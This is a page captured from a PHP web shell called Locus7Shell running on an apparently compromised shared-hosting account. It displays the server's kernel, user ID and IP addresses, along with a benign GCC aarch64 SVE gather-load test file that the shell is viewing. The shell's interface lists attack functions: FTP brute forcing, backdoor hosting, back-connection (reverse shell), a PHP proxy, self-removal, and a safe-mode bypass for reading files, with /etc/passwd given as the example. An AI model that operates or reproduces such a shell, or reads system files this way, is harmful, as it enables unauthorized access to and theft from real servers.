Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/aarch64/sve/acle/asm/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     ld1_gather_s32.c (7.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-final { check-function-bodies "**" "" "-DCHECK_ASM" { target { ! ilp32 } } } } */

#include "test_sve_acle.h"

/*
** ld1_gather_s32_tied1:
**    ld1w    z0\.s, p0/z, \[z0\.s\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_s32_tied1, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_s32 (p0, z0),
             z0_res = svld1_gather_s32 (p0, z0))

/*
** ld1_gather_s32_untied:
**    ld1w    z0\.s, p0/z, \[z1\.s\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_s32_untied, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_s32 (p0, z1),
             z0_res = svld1_gather_s32 (p0, z1))

/*
** ld1_gather_x0_s32_offset:
**    ld1w    z0\.s, p0/z, \[x0, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_x0_s32_offset, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_offset_s32 (p0, z0, x0),
             z0_res = svld1_gather_offset_s32 (p0, z0, x0))

/*
** ld1_gather_m4_s32_offset:
**    mov    (x[0-9]+), #?-4
**    ld1w    z0\.s, p0/z, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_m4_s32_offset, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_offset_s32 (p0, z0, -4),
             z0_res = svld1_gather_offset_s32 (p0, z0, -4))

/*
** ld1_gather_0_s32_offset:
**    ld1w    z0\.s, p0/z, \[z0\.s\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_0_s32_offset, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_offset_s32 (p0, z0, 0),
             z0_res = svld1_gather_offset_s32 (p0, z0, 0))

/*
** ld1_gather_5_s32_offset:
**    mov    (x[0-9]+), #?5
**    ld1w    z0\.s, p0/z, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_5_s32_offset, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_offset_s32 (p0, z0, 5),
             z0_res = svld1_gather_offset_s32 (p0, z0, 5))

/*
** ld1_gather_6_s32_offset:
**    mov    (x[0-9]+), #?6
**    ld1w    z0\.s, p0/z, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_6_s32_offset, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_offset_s32 (p0, z0, 6),
             z0_res = svld1_gather_offset_s32 (p0, z0, 6))

/*
** ld1_gather_7_s32_offset:
**    mov    (x[0-9]+), #?7
**    ld1w    z0\.s, p0/z, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_7_s32_offset, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_offset_s32 (p0, z0, 7),
             z0_res = svld1_gather_offset_s32 (p0, z0, 7))

/*
** ld1_gather_8_s32_offset:
**    ld1w    z0\.s, p0/z, \[z0\.s, #8\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_8_s32_offset, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_offset_s32 (p0, z0, 8),
             z0_res = svld1_gather_offset_s32 (p0, z0, 8))

/*
** ld1_gather_124_s32_offset:
**    ld1w    z0\.s, p0/z, \[z0\.s, #124\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_124_s32_offset, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_offset_s32 (p0, z0, 124),
             z0_res = svld1_gather_offset_s32 (p0, z0, 124))

/*
** ld1_gather_128_s32_offset:
**    mov    (x[0-9]+), #?128
**    ld1w    z0\.s, p0/z, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_128_s32_offset, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_offset_s32 (p0, z0, 128),
             z0_res = svld1_gather_offset_s32 (p0, z0, 128))

/*
** ld1_gather_x0_s32_index:
**    lsl    (x[0-9]+), x0, #?2
**    ld1w    z0\.s, p0/z, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_x0_s32_index, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_index_s32 (p0, z0, x0),
             z0_res = svld1_gather_index_s32 (p0, z0, x0))

/*
** ld1_gather_m1_s32_index:
**    mov    (x[0-9]+), #?-4
**    ld1w    z0\.s, p0/z, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_m1_s32_index, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_index_s32 (p0, z0, -1),
             z0_res = svld1_gather_index_s32 (p0, z0, -1))

/*
** ld1_gather_0_s32_index:
**    ld1w    z0\.s, p0/z, \[z0\.s\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_0_s32_index, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_index_s32 (p0, z0, 0),
             z0_res = svld1_gather_index_s32 (p0, z0, 0))

/*
** ld1_gather_5_s32_index:
**    ld1w    z0\.s, p0/z, \[z0\.s, #20\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_5_s32_index, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_index_s32 (p0, z0, 5),
             z0_res = svld1_gather_index_s32 (p0, z0, 5))

/*
** ld1_gather_31_s32_index:
**    ld1w    z0\.s, p0/z, \[z0\.s, #124\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_31_s32_index, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_index_s32 (p0, z0, 31),
             z0_res = svld1_gather_index_s32 (p0, z0, 31))

/*
** ld1_gather_32_s32_index:
**    mov    (x[0-9]+), #?128
**    ld1w    z0\.s, p0/z, \[\1, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_ZS (ld1_gather_32_s32_index, svint32_t, svuint32_t,
             z0_res = svld1_gather_u32base_index_s32 (p0, z0, 32),
             z0_res = svld1_gather_index_s32 (p0, z0, 32))

/*
** ld1_gather_x0_s32_s32offset:
**    ld1w    z0\.s, p0/z, \[x0, z0\.s, sxtw\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_x0_s32_s32offset, svint32_t, int32_t, svint32_t,
             z0_res = svld1_gather_s32offset_s32 (p0, x0, z0),
             z0_res = svld1_gather_offset (p0, x0, z0))

/*
** ld1_gather_tied1_s32_s32offset:
**    ld1w    z0\.s, p0/z, \[x0, z0\.s, sxtw\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_tied1_s32_s32offset, svint32_t, int32_t, svint32_t,
             z0_res = svld1_gather_s32offset_s32 (p0, x0, z0),
             z0_res = svld1_gather_offset (p0, x0, z0))

/*
** ld1_gather_untied_s32_s32offset:
**    ld1w    z0\.s, p0/z, \[x0, z1\.s, sxtw\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_untied_s32_s32offset, svint32_t, int32_t, svint32_t,
             z0_res = svld1_gather_s32offset_s32 (p0, x0, z1),
             z0_res = svld1_gather_offset (p0, x0, z1))

/*
** ld1_gather_x0_s32_u32offset:
**    ld1w    z0\.s, p0/z, \[x0, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_x0_s32_u32offset, svint32_t, int32_t, svuint32_t,
             z0_res = svld1_gather_u32offset_s32 (p0, x0, z0),
             z0_res = svld1_gather_offset (p0, x0, z0))

/*
** ld1_gather_tied1_s32_u32offset:
**    ld1w    z0\.s, p0/z, \[x0, z0\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_tied1_s32_u32offset, svint32_t, int32_t, svuint32_t,
             z0_res = svld1_gather_u32offset_s32 (p0, x0, z0),
             z0_res = svld1_gather_offset (p0, x0, z0))

/*
** ld1_gather_untied_s32_u32offset:
**    ld1w    z0\.s, p0/z, \[x0, z1\.s, uxtw\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_untied_s32_u32offset, svint32_t, int32_t, svuint32_t,
             z0_res = svld1_gather_u32offset_s32 (p0, x0, z1),
             z0_res = svld1_gather_offset (p0, x0, z1))

/*
** ld1_gather_x0_s32_s32index:
**    ld1w    z0\.s, p0/z, \[x0, z0\.s, sxtw 2\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_x0_s32_s32index, svint32_t, int32_t, svint32_t,
             z0_res = svld1_gather_s32index_s32 (p0, x0, z0),
             z0_res = svld1_gather_index (p0, x0, z0))

/*
** ld1_gather_tied1_s32_s32index:
**    ld1w    z0\.s, p0/z, \[x0, z0\.s, sxtw 2\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_tied1_s32_s32index, svint32_t, int32_t, svint32_t,
             z0_res = svld1_gather_s32index_s32 (p0, x0, z0),
             z0_res = svld1_gather_index (p0, x0, z0))

/*
** ld1_gather_untied_s32_s32index:
**    ld1w    z0\.s, p0/z, \[x0, z1\.s, sxtw 2\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_untied_s32_s32index, svint32_t, int32_t, svint32_t,
             z0_res = svld1_gather_s32index_s32 (p0, x0, z1),
             z0_res = svld1_gather_index (p0, x0, z1))

/*
** ld1_gather_x0_s32_u32index:
**    ld1w    z0\.s, p0/z, \[x0, z0\.s, uxtw 2\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_x0_s32_u32index, svint32_t, int32_t, svuint32_t,
             z0_res = svld1_gather_u32index_s32 (p0, x0, z0),
             z0_res = svld1_gather_index (p0, x0, z0))

/*
** ld1_gather_tied1_s32_u32index:
**    ld1w    z0\.s, p0/z, \[x0, z0\.s, uxtw 2\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_tied1_s32_u32index, svint32_t, int32_t, svuint32_t,
             z0_res = svld1_gather_u32index_s32 (p0, x0, z0),
             z0_res = svld1_gather_index (p0, x0, z0))

/*
** ld1_gather_untied_s32_u32index:
**    ld1w    z0\.s, p0/z, \[x0, z1\.s, uxtw 2\]
**    ret
*/
TEST_LOAD_GATHER_SZ (ld1_gather_untied_s32_u32index, svint32_t, int32_t, svuint32_t,
             z0_res = svld1_gather_u32index_s32 (p0, x0, z1),
             z0_res = svld1_gather_index (p0, x0, z1))

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0063 ]--